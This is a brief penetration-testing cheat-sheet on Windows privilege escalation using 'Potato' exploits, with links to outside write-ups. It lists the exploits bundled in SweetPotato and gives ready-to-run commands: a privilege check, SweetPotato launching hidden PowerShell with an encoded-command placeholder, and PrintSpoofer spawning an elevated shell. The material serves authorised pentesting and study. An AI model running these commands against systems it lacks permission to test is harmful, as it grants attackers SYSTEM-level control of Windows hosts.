Potatoes are a common way to escalate privileges on a Windows system after either theSeImpersonate or SeAssignPrimaryToken privileges have been enumerated. This can be accomplished quickly by running the following command:
whoami /privAs noted by Jorge Lajara, Sweet Potato is one of the most successful potatoes to escalate privileges with. It contains the following exploits built-in to it, rendering the other potatoes obsolete:
- RottenPotato
- Weaponized JuicyPotato with BITS WinRM discovery
- PrintSpoofer
- EfsRpc built on EfsPotato
- PetitPotam
# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"# Verify that the Print Spooler service is running
Get-Service Spooler
# Run the PrintSpoofer executable to escalate privileges
.\PrintSpoofer.exe -i -c powershell{% embed url="https://jlajara.gitlab.io/Potatoes_Windows_Privesc" %} Guidance on using Potatoes {% endembed %}
{% embed url="https://github.com/itm4n/PrintSpoofer" %}
{% embed url="https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/" %}